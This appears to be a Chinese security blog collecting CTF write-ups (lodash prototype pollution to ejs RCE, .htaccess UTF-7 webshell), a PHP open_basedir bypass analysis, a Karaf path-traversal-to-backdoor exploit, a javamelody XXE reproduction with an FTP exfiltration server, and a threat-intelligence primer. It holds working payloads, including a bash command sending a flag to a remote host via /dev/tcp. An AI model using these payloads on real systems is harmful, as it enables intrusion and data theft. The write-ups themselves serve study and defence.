
拿到一个nodejs项目的源码进行审计,第一步便是运行npm audit ,可以看到依赖项的漏洞情况。

image-20190829023406409

可以看到依赖项lodash存在原型链污染漏洞,即CVE-2019-10744.

我们查看一下项目的js源码,看看哪里调用了lodash.在查看消息的请求处理中我们可以看到当消息数量大于5时将会调用lodash.defaultsDeep来合并消息

lodash

根据CVE-2019-10744的信息,我们知道我们只需要有消息为

1
{"type":"test","content":{"prototype":{"constructor":{"a":"b"}}}}

在合并时便会在Object上附加a=b这样一个属性,任意不存在a属性的原型为Object的对象在访问其a属性时均会获取到b属性。那么这个污染究竟会起到什么样的效果?

查看项目源码,可以知道该项目使用ejs库作为模版引擎,众所周知ejs作为一个模版引擎肯定少不了类似eval的操作用于解析一些数据。因此我们便可以去跟一下ejs的实现看看哪里有潜在的可以收到原型链污染的调用,这里我们可以找到两处可用的地方

pollution one

pollution one

在577行可以看到很大的一片调用全是为了动态拼接一个js语句,这里我们可以注意到当opts存在属性outputFunctionName时,该属性outputFunctionName便会被直接拼接到这段js中。

往下跟一下可以看到这段js的具体调用位置

append

src

ctor

可以看到这段代码最后生成了一个动态的函数,且源码中正含有上述的append.所以我们的思路就很清晰了,只要覆盖了opts.outputFunctionName即可触发模版编译处的RCE.

最后我们的payload如下:

1
2
{"type":"mmp","content":{"constructor":{"prototype":
{"outputFunctionName":"a=1;process.mainModule.require('child_process').exec('bash -c \"echo $FLAG>/dev/tcp/xxxxx/xx\"')//"}}}}

只要提交这样的信息并触发合并操作,访问任意页面即可将flag发送到我们的后端。

pollution two

除了这里的outputFunctionName外我们也可以覆盖opts.escapeFunction来实现RCE,具体源码关键点对应如下

预期解

赛后看了NESE大佬的官方writeup,则利用了前端和后端两个原型链污染的点,后端原型链污染用于绕过登录验证越权登录admin,覆盖loginuserid即可

而前端的原型链污染则是由于调用了$.extend方法

extend

所有的消息都被加入了no-js,我们再看看页面是怎么渲染的

logger

Header/notice/wiki/button/message的地方都处在沙箱中,无法XSS,我们再看看页面

可以看到我们只要通过原型链污染添加logger属性,即可覆盖logger的内容从而导致XSS。为了打到flag只需要让页面跳转到一个我们设置的伪造的登录窗口即可。

这道题目预期解将前后端的原型链污染结合利用,可以说是十分精妙的一道题目。

ezPHP

源码很简单(感觉越简单的源码越不好搞),一个写文件的功能且只能写文件名为[a-z\.]* 的文件,且文件内容存在黑名单过滤,并且结尾被加上了一行,这就导致我们无法直接写入.htaccess里面auto_prepend_file等php_value。

我们的解法

经测试,最后一行导致的.htaccess报错的问题可以通过# \来解决。

该文件中有一处include('fl3g,php'),该文件名不能通过正则匹配所以我们没办法直接利用该文件来getshell。那么还有什么.htaacess 的选项可以利用?

翻一下php的官方文档php.ini配置选项列表,查找所有可修改范围为PHP_INI_ALLPHP_INI_PERDIR的配置项,我们可以注意到这样一个选项include_path.

include_path

因此只要控制include_path便可以使这里include进来的fl3g.php可以是任意目录下的某个文件,那么怎样才能控制fl3g.php的内容?查找所有php log相关的功能可以看到error_log这一选项

error_log

所以我们的思路便很清晰了:利用error_log写入log文件到/tmp/fl3g.php,再设置include_path=/tmp即可让index.php能够包含我们想要的文件。这里的报错可以通过设置include_path到一个不存在的文件夹即可触发包含时的报错,且include_path的值也会被输出到屏幕上。

然而很不幸的是error_log的内容默认是htmlentities的,我们无法插入类似<?php phpinfo();?>的payload。那么怎么才能绕过这里的转义?

查找最近的比赛我们可以发现一篇writeupInsomnihack 2019 I33t-hoster)

run php without <

这便给了我们启示可以通过设置编码来绕过限制从而getshell.

因此最后的攻击方法如下:

  • Step1 写入.htaccess error_log相关的配置
1
2
3
4
php_value include_path "/tmp/xx/+ADw?php die(eval($_GET[2]))+ADs +AF8AXw-halt+AF8-compiler()+ADs"
php_value error_reporting 32767
php_value error_log /tmp/fl3g.php
# \
  • Step2 访问index.php留下error_log
  • Step3 写入.htaccess新的配置
1
2
3
4
php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value include_path "/tmp"
# \
  • Step4 再访问一次index.php?2=evilcode即可getshell.

其他非预期解

赛后得知我们的解法是全场唯一的正解,此外还存在两个非预期

非预期1

设置pcre的一些选项可以导致文件名判断失效,从而直接写入fl3g.php

1
2
php_value pcre.backtrack_limit 0
php_value pcre.jit 0

非预期2

只能说这个非预期为啥我没有想到

1
2
3
php_value auto_prepend_fi\
le ".htaccess"
# <?php phpinfo();?>

总结

以上便是我们这次XNUCA web部分的writeup,质量非常高的一场比赛,感谢NESE的大佬们。希望国内能多一些这样质量高的CTF,少一些诸如某空间之类的垃圾比赛,也希望CTF圈选手们以后都能洁身自好杜绝py现象。

Posted on | In

浅谈威胁情报

什么是威胁情报?

威胁情报在百度百科上给出的定义是某种基于证据的知识,包括上下文、机制、标示、含义和能够执行的建议,这些知识与资产所面临已有的或酝酿中的威胁或危害相关,可用于资产相关主体对威胁或危害的响应或处理决策提供信息支持。业内大多数所说的威胁情报可以认为是狭义的威胁情报,其主要内容为用于识别和检测威胁的失陷标识,如文件HASH,IP,域名,程序运行路径,注册表项等,以及相关的归属标签。参考John Friedman和Mark Bouchard在2015年发表的网络威胁情报权威指南中下的定义:对敌方的情报,及其动机、企图和方法进行收集、分析和传播,帮助各个层面的安全和业务成员保护企业关键资产。情报即线索,威胁情报便是为了还原已发生的攻击和预测未发生的攻击所需要的一切线索。

安全圈所涉及的情报的范畴主要包括威胁情报、漏洞情报、资产情报。漏洞情报主要与脆弱点相关,描述的是本身业务存在的隐患问题;资产情报主要为内部IT业务资产和人的信息,而威胁情报则主要针对攻击者的威胁。而威胁情报又可以分为具体三类:

  • 战术级情报
  • 运营级情报
  • 战略级情报

威胁情报的作用

从威胁情报的分类来看:

  • 战术级情报的作用主要是发现威胁事件,并对报警进行确认或者做优先级排序。常见的失陷检测情报(CnC情报,即攻击者控制被害主机所使用的远程指令与控制服务器等等的相关情报)、IP情报(访问互联网服务器的IP主机的相关信息的集合,可能包含恶意主机)便属于这种范畴。
  • 运营及情报的主要作用是对已知的重要安全事件做分析(报警确认、攻击影响范围、攻击链以及攻击目的、技术战术方法等等)或者利用已知的攻击者技术战术手法主动地查找攻击相关的线索。
  • 战略级情报主要目的是让安全管理者确定安全上的投入量、安全上的主要投入的方向等等,由于包括了什么样的组织会进行攻击,攻击可能造成的危害后果、攻击者的战术能力和掌控的资源情况等等以及攻击案例,可是安全管理者的决策不再盲目,更加针对组织的业务情况以及真正威胁。
    总体来说,威胁情报的主要作用便是方便企业及时最小化已发生的攻击产生的影响,追踪攻击来源并且再下次攻击产生之前做好防范,确认自身产品可能的缺陷并合理设置安全方面的投入力度与措施。

威胁情报的作用点

威胁情报的作用点主要有:

  • 攻击检测与防御
    基于威胁情报数据可以创建IDPs或者AV产品的签名,或者生成NFT(网络取证工具)、SIEM、ETDR(终端威胁检测及响应)等等产品的规则,用于攻击检测;
  • 攻击溯源
    依赖于威胁情报可以对攻击溯源做更简单、更高效的处理。
  • 态势感知
    利用威胁情报对自身服务弱点进行感知、获取外部咨询,从而对安全运营做更合理的安排

威胁情报是怎么生产的

威胁情报的生产就是通过对原始数据/样本的采集、交换、分析、追踪,之后产生和共享有价值的威胁情报信息的过程。
生产者可以通过使用蜜罐、沙箱、终端等手段收集大量的信息,经过初级或者专业技术分析后提供给消费者,满足消费者的服务安全运行的需求。腾讯等公司拥有庞大的数据基础,因此能够提供相对全面的初始数据与初级分析的情报。除了庞大的数据意外,也可以通过多种渠道收集数据,经过对数据的加工、处理、筛选等二次分析来得到更加贴近真相的威胁情报。

威胁情报是怎么消费的

威胁情报的消费是指将企业和客户网络中的安全数据与威胁情报进行比对、验证,以及企业和客户方的安全分析师利用威胁情报进行分析的过程。威胁情报是否有价值,有多大价值,最终取决于消费者。
参考gartner的论文,威胁情报消费的方式主要有:

  • Web分类
  • 网站信誉 预测访问网站的安全风险
  • IP信誉
  • 反网络钓鱼
  • 文件信誉 恶意文件黑名单,预防恶意软件的分发
  • 移动应用信誉 分析恶意移动应用

威胁情报共享的相关指标、规范

  • CybOX
    Cyber Observable eXpression (CybOX) 规范定义了一个表征计算机可观察对象与网络动态和实体的方法。可观察对象包括文件,HTTP会话,X509证书,系统配置项等。CybOX 规范提供了一套标准且支持扩展的语法,用来描述所有我们可以从计算系统和操作上观察到的内容。在某些情况下,可观察的对象可以作为判断威胁的指标,比如Windows的RegistryKey。这种可观察对象由于具有某个特定值,往往作为判断威胁存在与否的指标。IP地址也是一种可观察的对象,通常作为判断恶意企图的指标。
  • STIX
    Structured Threat Information eXpression (STIX) 提供了基于标准XML的语法描述威胁情报的细节和威胁内容的方法。STIX支持使用CybOX格式去描述大部分STIX语法本身就能描述的内容,当然,STIX还支持其他格式。标准化将使安全研究人员交换威胁情报的效率和准确率大大提升,大大减少沟通中的误解,还能自动化处理某些威胁情报。实践证明,STIX规范可以描述威胁情报中多方面的特征,包括威胁因素,威胁活动,安全事故等。它极大程度利用DHS规范来指定各个STIX实体中包含的数据项的格式。
  • TAXII
    Trusted Automated eXchange of Indicator Information (TAXII) 提供安全的传输和威胁情报信息的交换。很多文章让人误以为TAXII只能传输TAXII格式的数据,但实际上它支持多种格式传输数据。当前的通常做法是用TAXII来传输数据,用STIX来作情报描述,用CybOX的词汇。
    TAXII在标准化服务和信息交换的条款中定义了交换协议,可以支持多种共享模型,包括hub-and-spoke,peer-to-peer,subscription。
    TAXII在提供了安全传输的同时,还无需考虑拓朴结构、信任问题、授权管理等策略,留给更高级别的协议和约定去考虑。

  • 其它规范
    不难看出,目前大量文章内容聚焦在STIX,TAXII,CybOX。有些文章甚至都没提到扮演着同样重要角色的CVE和CVSS。另外,还有很多DHS的补充性规范也经常被所谓的“专家”所忽视。
    Common Platform Enumeration(CPE)和Common Configuration Enumeration(CCE)规范了平台和配置的描述标准,就像CVE规范了漏洞的描述标准一样。Common Configuration Scoring System(CCSS)则提供了一套基于CVSS的指标。
    其他规范包括:

    • Common Weakness Enumeration (CWE) 定义了通用软件设计与实现的弱点,安全漏洞往往是由这些弱点而来的。

    • Common Attack Pattern Enumeration and Classification (CAPEC) 提供了一个与跨事件攻击相似的功能。

    • Malware Attribute Enumeration and Characterization (MAEC) 可用于描述恶意软件的信息,类似于CVE和漏洞之间的关系。

    • Open Vulnerability Assessment Language (OVAL) 为评估漏洞范围和影响提供了一个框架。

当然还有其他的规范和标准,就不一一列举了。所有这些规范的目标都是覆盖更全面的安全通信领域,并使之成为一种标准化的东西。

  • 美国政府和威胁情报
    美国的标准化工作和努力紧密围绕Defense Information Systems Agency(国防信息系统局,简称DISA)和美国National Institute of Standards and Technology(国际标准与技术研究院,简称NIST)。 NIST主要制定系统安全的规范,特别是网络安全框架规范,并主管计算机安全资源中心。 DISA则负责制定Secure Technical Implementation Guides (安全技术实施指南,简称STIGs)来规范信息系统的安全安装与维护。这些高级术语可不止是表面功夫,它们指代了包含技术指导在内的多种标准,允许安装和维修人员锁定系统,否则可能容易受到攻击。
    最近,这些组织已经完全支持NIST 的Security Content Automation Protocol (安全内容自动化协议,简称SCAP)。National Vulnerability Database (国家漏洞数据库,简称NVD) 提供官方 SCAP 映射层。这个开放标准的套件目的是:让安全配置的管理和测量能像威胁情报共享一样自动化。
    虽然不是经常被提起,但STIX协议可以和其他方式一样,轻松地封装SCAP的payloads。事实上,来自DHS系列中的很多标准其实都已经被SCAP覆盖到了。SCAP实际包含以下的标准:
  • CVE
  • CCE(通用配置列表标准)
  • CPE
  • CVSS
  • CCSS
  • OVAL
  • Extensible Configuration Checklist Description Format (可扩展性配置清单描述格式标准,简称XCCDF)
  • Open Checklist Interactive Language ​(开放检查表交互式语言,简称OCIL)

上述的除了XCCDF,OCIL和CCSS来自DHS系列标准,剩下的都是NIST定义的。XCCDF给系统配置规则的结构化集合提供了一个标准的描述。该标准支持自动化信息交换,合规测试与评分,同时大家仍然可以根据具体需求来作定制化开发。与DHS的安全威胁情报系列标准相比,XCCDF与DHS系列中的CCE仅存在少量差异。幸运的是,这是SCAP覆盖的内容和DHS系列规范中唯一的明显差异。
OCIL提供了一个标准化的框架,以描述清单问题和解答问题的步骤,而CCSS有一套指标来衡量软件配置问题的安全性。它从公认的CVSS规范衍生出来,并提供类似的功能。

  • MILE
    Managed Incident Lightweight Exchange (轻量级交换托管事件,简称MILE) 封装的标准涵盖了与DHS系列规范大致相同的的内容,特别是CybOX,STIX和TAXII。MILE标准为指标和事件定义了一个数据格式。该封装还包含了 Incident Object Description and Exchange Format (事件对象描述和交换格式,简称IODEF)。IODEF合并了许多DHS系列规范的数据格式,并提供了一种交换那些可操作的统计性事件信息的格式,且支持自动处理。它还包含了IODEF for Structured Cybersecurity Information(结构化网络安全信息,简称IODEF-SCI)扩展和Realtime Internetwork Defense (实时网络防御,简称RID),支持自动共享情报和事件。

国内外威胁情报的玩家

在Gartner的论文Market Guide for Security Threat Intelligence Products and Services中列举了国外的28家商用的威胁情报服务与9家免费的威胁情报服务。
而许多企业也都建立了威胁情报平台(TIP),如微步威胁情报平台RedQueen安全智能服务平台,IBM情报中心,360威胁情报中心,腾讯御见威胁情报中心等等。

在国内,我国的国家网络空间威胁情报共享开放平台也接入了多家企业, 如360、CNCERT、天融信、绿盟、安天、深信服等多家安全企业,共同提供情报开放共享、情报关联融合、情报评估校验等工作。

衡量威胁情报质量的方法

威胁情报质量的评估具有以下几个原则:

  • 科学性与实用性
  • 系统性和层次性
  • 全面性和代表性
  • 动态性和静态性
  • 我们需要在下面四个方面去保障其质量:
  • 相关性
    要求更能强调和具体用户的地域性、行业性相关,即需要针对此用户的环境,能发现可能遭遇的重要威胁。
  • 及时性
    情报的及时性是由多个因素构成的,包括数据收集的及时性、云端处理的及时性、情报分发的及时性等等。
  • 精确性
    此特性主要指我们一般说的误报率指标。
  • 可指导响应的上下文
    上下文一定是对决策、行动有帮助,与此无关给出的信息越多,说明情报的质量越差。

因此,针对威胁情报的这些属性,我们可以采取一些测试方法来进行测试:

  • 新鲜度测试
  • 流行度测试
  • 独特性测试
  • 覆盖测试
  • 过期测试
  • 关联测试

威胁情报的生产途径

  • 基于大数据的方式,根据海量的恶意请求信息等提取共同点等来追踪威胁情报
  • 蜜罐等网络设备,用于抓取恶意流量以及恶意文件样本等进行分析
  • 基于开放或者付费的威胁情报平台提取有关的信息
  • 技术网站等的报告中提取威胁情报信息

Posted on

php open_basedir poc分析

近日在CTF交流群中看到一个绕过open_basedir限制的poc

对这个poc产生了极大的兴趣,因此翻出php的源码来下断点分析一波php open_basedir的机制。

/main/fopen_wrappers.cPHPAPI int php_check_open_basedir_ex(const char *path, int warn)方法是php在处理文件操作时用于验证open_basedir的方法。我们查看一下他的实现方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
PHPAPI int php_check_open_basedir_ex(const char *path, int warn)
{
	/* Only check when open_basedir is available */
	if (PG(open_basedir) && *PG(open_basedir)) {
		char *pathbuf;
		char *ptr;
		char *end;

		/* Check if the path is too long so we can give a more useful error
		* message. */
		if (strlen(path) > (MAXPATHLEN - 1)) {
			php_error_docref(NULL, E_WARNING, "File name is longer than the maximum allowed path length on this platform (%d): %s", MAXPATHLEN, path);
			errno = EINVAL;
			return -1;
		}

		pathbuf = estrdup(PG(open_basedir));

		ptr = pathbuf;

		while (ptr && *ptr) {
			end = strchr(ptr, DEFAULT_DIR_SEPARATOR);
			if (end != NULL) {
				*end = '\0';
				end++;
			}

			if (php_check_specific_open_basedir(ptr, path) == 0) {
				efree(pathbuf);
				return 0;
			}

			ptr = end;
		}
		if (warn) {
			php_error_docref(NULL, E_WARNING, "open_basedir restriction in effect. File(%s) is not within the allowed path(s): (%s)", path, PG(open_basedir));
		}
		efree(pathbuf);
		errno = EPERM; /* we deny permission to open it */
		return -1;
	}

	/* Nothing to check... */
	return 0;
}

跟进php_check_specific_open_basedir,这个函数是具体实现每一个路径的判断,一个很长的函数,重点在如下几行:

1
2
3
if (expand_filepath(path, resolved_name) == NULL) {
		return -1;
	}

这里是将传入的path扩展为绝对路径存放于resolved_name

第214行

1
if (expand_filepath(local_open_basedir, resolved_basedir) != NULL) {

这里会根据local_open_basedir的值扩展为绝对路径存放于resolved_basedir

241行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
if (strncasecmp(resolved_basedir, resolved_name, resolved_basedir_len) == 0) {
#else
		if (strncmp(resolved_basedir, resolved_name, resolved_basedir_len) == 0) {
#endif
			if (resolved_name_len > resolved_basedir_len &&
				resolved_name[resolved_basedir_len - 1] != PHP_DIR_SEPARATOR) {
				return -1;
			} else {
				/* File is in the right directory */
				return 0;
			}
		} else {
			/* /openbasedir/ and /openbasedir are the same directory */
			if (resolved_basedir_len == (resolved_name_len + 1) && resolved_basedir[resolved_basedir_len - 1] == PHP_DIR_SEPARATOR) {
#ifdef PHP_WIN32
				if (strncasecmp(resolved_basedir, resolved_name, resolved_name_len) == 0) {
#else
				if (strncmp(resolved_basedir, resolved_name, resolved_name_len) == 0) {
#endif
					return 0;
				}
			}
			return -1;
		}

可以看到这里在判断是否在路径范围内时,主要比较依据是先用strncmp判断与resolved_basedir长度内的部分是否完全一致,一致的话如果resolved_name与resolved_basedir长度相等则说明就在同一路径,返回0表示允许,长度大于resolved_basedir则判断超出的第一个字符是否不是/,是则返回成功,不是则返回失败。

这里我们再重点看一下expand_filepath这个函数的实现,主要实现为PHPAPI char *expand_filepath_with_mode,重点位于814行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

	if (virtual_file_ex(&new_state, filepath, NULL, realpath_mode)) {
		efree(new_state.cwd);
		return NULL;
	}

	if (real_path) {
		copy_len = new_state.cwd_length > MAXPATHLEN - 1 ? MAXPATHLEN - 1 : new_state.cwd_length;
		memcpy(real_path, new_state.cwd, copy_len);
		real_path[copy_len] = '\0';
	} else {
		real_path = estrndup(new_state.cwd, new_state.cwd_length);
	}
	efree(new_state.cwd);

	return real_path;
}

查看virtual_file_ex的实现,1337行之前的操作为如果path不是绝对路径则将path拼接至state.cwd得到resolved_path,重点第1337行

1
path_length = tsrm_realpath_r(resolved_path, start, path_length, &ll, &t, use_realpath, 0, NULL);

跟进tsrm_realpath_r,可以看到操作主要是递归去掉双斜杠和.以及..

这便是php在处理文件操作判断open_basedir的实现。我们再看php的内置函数ini_set的实现方法,在ext/standard/basic_functions.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
PHP_FUNCTION(ini_set)
{
	zend_string *varname;
	zend_string *new_value;
	zend_string *val;

	ZEND_PARSE_PARAMETERS_START(2, 2)
		Z_PARAM_STR(varname)
		Z_PARAM_STR(new_value)
	ZEND_PARSE_PARAMETERS_END();

	val = zend_ini_get_value(varname);

	/* copy to return here, because alter might free it! */
	if (val) {
		if (ZSTR_IS_INTERNED(val)) {
			RETVAL_INTERNED_STR(val);
		} else if (ZSTR_LEN(val) == 0) {
			RETVAL_EMPTY_STRING();
		} else if (ZSTR_LEN(val) == 1) {
			RETVAL_INTERNED_STR(ZSTR_CHAR((zend_uchar)ZSTR_VAL(val)[0]));
		} else if (!(GC_FLAGS(val) & GC_PERSISTENT)) {
			ZVAL_NEW_STR(return_value, zend_string_copy(val));
		} else {
			ZVAL_NEW_STR(return_value, zend_string_init(ZSTR_VAL(val), ZSTR_LEN(val), 0));
		}
	} else {
		RETVAL_FALSE;
	}

#define _CHECK_PATH(var, var_len, ini) php_ini_check_path(var, var_len, ini, sizeof(ini))
	/* open basedir check */
	if (PG(open_basedir)) {
		if (_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), "error_log") ||
			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), "java.class.path") ||
			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), "java.home") ||
			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), "mail.log") ||
			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), "java.library.path") ||
			_CHECK_PATH(ZSTR_VAL(varname), ZSTR_LEN(varname), "vpopmail.directory")) {
			if ( (ZSTR_VAL(new_value))) {
				zval_ptr_dtor_str(return_value);
				RETURN_FALSE;
			}
		}
	}
#undef _CHECK_PATH

	if (zend_alter_ini_entry_ex(varname, new_value, PHP_INI_USER, PHP_INI_STAGE_RUNTIME, 0) == FAILURE) {
		zval_ptr_dtor_str(return_value);
		RETURN_FALSE;
	}
}

由于我们ini_set的是open_basedir于是重要一行便落到了

1
if (zend_alter_ini_entry_ex(varname, new_value, PHP_INI_USER, PHP_INI_STAGE_RUNTIME, 0) == FAILURE) {

查看zend_alter_ini_entry_ex的实现,重要几行为

1
2
3
4
5
6
7
8
9
10
if (!ini_entry->on_modify
		|| ini_entry->on_modify(ini_entry, duplicate, ini_entry->mh_arg1, ini_entry->mh_arg2, ini_entry->mh_arg3, stage) == SUCCESS) {
		if (modified && ini_entry->orig_value != ini_entry->value) { /* we already changed the value, free the changed value */
			zend_string_release(ini_entry->value);
		}
		ini_entry->value = duplicate;
	} else {
		zend_string_release(duplicate);
		return FAILURE;
	}

调试可知,open_basedir对应的on_modify函数为OnUpdateBaseDir,重要几行为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ptr = pathbuf = estrdup(ZSTR_VAL(new_value));
	while (ptr && *ptr) {
		end = strchr(ptr, DEFAULT_DIR_SEPARATOR);
		if (end != NULL) {
			*end = '\0';
			end++;
		}
		if (php_check_open_basedir_ex(ptr, 0) != 0) {
			/* At least one portion of this open_basedir is less restrictive than the prior one, FAIL */
			efree(pathbuf);
			return FAILURE;
		}
		ptr = end;
	}

可见这里便是调用了php_check_open_basedir_ex来判断要更改的open_basedir是否合法。

回到zend_alter_ini_entry_ex

1
2
3
4
5
6
7
8
9
duplicate = zend_string_copy(new_value);

	if (!ini_entry->on_modify
		|| ini_entry->on_modify(ini_entry, duplicate, ini_entry->mh_arg1, ini_entry->mh_arg2, ini_entry->mh_arg3, stage) == SUCCESS) {
		if (modified && ini_entry->orig_value != ini_entry->value) { /* we already changed the value, free the changed value */
			zend_string_release(ini_entry->value);
		}
		ini_entry->value = duplicate;
	}

可以看到open_basedir便会被直接设置为我们设置的值。

再来看我们的poc

1
2
3
4
5
6
7
8
9
<?php
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');

假定我们的open_basedir/var/www/html,我们位于/var/www/html/test目录下

执行第一个ini_set时,首先判断/var/www/html/test/../var/www/html/是否为open_basedir内,判断成功,因此直接更新open_basedir为..

执行chdir('..')时,检测open_basedir,..根据当前目录补全后为/var/www/html,而我们的open_basedir..,补全后也是/var/www/html,因此可以chdir成功。

再次chdir('..'),检测open_basedir,..补全为/var/www,而此时的open_basedir补全也为/var/www,判断成功。

因此一系列的chdir('..')都会成功执行,最后当前目录跳到了/open_basedir..,设置open_basedir('/')同样可以执行成功,便成功实现了调整open_basedir至任意目录。

这个poc的构造十分巧妙,修复建议便是禁止在open_basedir已有的情况下修改open_basedir或者禁open_basedir可以被设置为相对路径。

Posted on | Edited on

做tctf时,由于以为RR师傅要放0day,所以就去审karaf的源码去了没有好好看karaf的文档。。。

在 org.apache.karaf.config.core.impl.ConfigMBeanImpl, 存在一个目录穿越写文件的漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
@Override
public void install(String url, String finalname, boolean override) throws MBeanException {
    try {
        File etcFolder = new File(System.getProperty("karaf.etc"));
        File file = new File(etcFolder, finalname);
        if (file.exists()) {
            if (!override) {
                throw new IllegalArgumentException("Configuration file {} already exists " + finalname);
            }
        }

        try (InputStream is = new BufferedInputStream(new URL(url).openStream())) {
            if (!file.exists()) {
                File parentFile = file.getParentFile();
                if (parentFile != null) {
                    parentFile.mkdirs();
                }
                file.createNewFile();
            }
            try (FileOutputStream fop = new FileOutputStream(file)) {
                StreamUtils.copy(is, fop);
            }
        } catch (RuntimeException | MalformedURLException e) {
            throw e;
        }
    } catch (Exception e) {
        throw new MBeanException(null, e.toString());
    }
}

可以看到我们能够通过..来穿越到任意目录。为了复现题目环境这里我们安装karaf并安装jolokia的bundle:

image-20190325213245494

然后只要发送这样一个包

1
2
3
4
5
6
7
8
9
10
11
12
POST /jolokia HTTP/1.1
Host: 111.186.63.207:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json
Content-Length: 179
Authorization: Basic a2FyYWY6a2FyYWY=
Connection: close
Upgrade-Insecure-Requests: 1

{  "type":"EXEC",  "mbean":"org.apache.karaf:name=root,type=config", "operation": "install", "arguments":["http://69.171.76.88/testfile","../../../../../../../tmp/testfile",true]}

image-20190325213944385

可以看到/tmp目录已经写入了文件。

image-20190325214108051

为了实现RCE,karaf会自动加载deploy目录下的bundle包,调用其Activator的start函数,因此我们只需要构造一个恶意的osgi bundle包在start函数中写入反弹shell的操作即可。

60EBB403F976DE0E087E4BD1751D897D

这里使用的bundle包源码放到了https://github.com/imagemlt/osgi-bundle-backdoor中,mvn install后再mvn package即可在target目录下找到生成的jar包。

Posted on

javamelody XXE(CVE-2018-15531) 复现分析

javaMelody是Spring Boot框架可用的一个监视服务器运行信息的插件,这个插件去年爆出了一个XXE的漏洞。这篇文章便分析一下这个漏洞。

漏洞复现

环境搭建

这里我使用了Idea来搭建spring boot的环境,创建好spring boot项目后在pom.xmldependencies中加入

1
2
3
4
5
<dependency>
            <groupId>net.bull.javamelody</groupId>
            <artifactId>javamelody-spring-boot-starter</artifactId>
            <version>1.73.1</version>
        </dependency>

之后启动程序,访问127.0.0.1:8080/monitoring便可以验证是否加载成功插件。

漏洞复现

漏洞复现使用的poc为:

1
2
3
4
5
6
7
8
9
10
11
12
POST / HTTP/1.1
Host: localhost:8080
Content-type: text/xml
SOAPAction: aaaaa
Content-Length: 154

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://127.0.0.1:5678/ev.dtd">
%remote;
]>
</root>

在本地起一个监听5678端口的http服务,这里我用的是php

76CFCEA4-4D3C-45E3-A98A-E1930AC33A0D

可以看到发包后可以收到http请求,因此存在XXE漏洞。

为了完成盲打读取文件的功能,ev.dtd的内容如下:

1
2
3
4
<!ENTITY % payload SYSTEM	"file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'ftp://127.0.0.1:2121/%payload;'>">
%int;
%trick;

使用如下的ruby脚本可以创建一个用于获取ftp请求的ftp服务器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
require 'socket'

ftp_server = TCPServer.new 2121
http_server = TCPServer.new 8088

log = File.open( "xxe-ftp.log", "a")

payload = '<!ENTITY % asd SYSTEM "file:///etc/passwd">'

Thread.start do
loop do
  Thread.start(http_server.accept) do |http_client|
	puts "HTTP. New client connected"
	loop {
		req = http_client.gets()
		break if req.nil?
		if req.start_with? "GET"
			http_client.puts("HTTP/1.1 200 OK\r\nContent-length: #{payload.length}\r\n\r\n#{payload}")
		end
		puts req
	}
	puts "HTTP. Connection closed"
  end
end

end

Thread.start do
loop do
  Thread.start(ftp_server.accept) do |ftp_client|
	puts "FTP. New client connected"
	ftp_client.puts("220 xxe-ftp-server")
	loop {
		req = ftp_client.gets()
		break if req.nil?
		puts "< "+req
		log.write "get req: #{req.inspect}\n"

		if req.include? "LIST"
			ftp_client.puts("drwxrwxrwx 1 owner group          1 Feb 21 04:37 test")
			ftp_client.puts("150 Opening BINARY mode data connection for /bin/ls")
			ftp_client.puts("226 Transfer complete.")
		elsif req.include? "USER"
			ftp_client.puts("331 password please - version check")
		elsif req.include? "PORT"
			puts "! PORT received"
			puts "> 200 PORT command ok"
			ftp_client.puts("200 PORT command ok")
		else
			puts "> 230 more data please!"
			ftp_client.puts("230 more data please!")
		end
	}
	puts "FTP. Connection closed"
  end
end
end

loop do
	sleep(10000)
end

运行脚本,Burp重新发包即可获取本地文件。

原理分析

根据大佬们的分析流程,直接查看之后的版本的patch可以定位导致漏洞出现的地方:

https://github.com/javamelody/javamelody/commit/ef111822562d0b9365bd3e671a75b65bd0613353

image-20190318100820061

可以看到官方的修复中直接禁用了XML中引用外部实体。我们跟进目标代码附近

8D9C800F-F636-422B-8D4C-80F1619A9FAF

可以看到这段代码是一个典型的XXE的漏洞代码。全局查找使用了parseSoapMethodName的地方

1D975EC2-AC3B-4978-B76D-AA2786281677

跟进initialize方法

image-20190318101340130

可以看到漏洞利用方法构造的要素:

  • POST方法
  • Content-type:为application/soap+xml或者Content-type为text/xml且存在SOAPAction请求头

参考文档

https://mp.weixin.qq.com/s?__biz=MzA4ODc0MTIwMw==&mid=2652531539&idx=1&sn=82d1f41acc32a0a21dff60b2dfb71421&source=41#wechat_redirect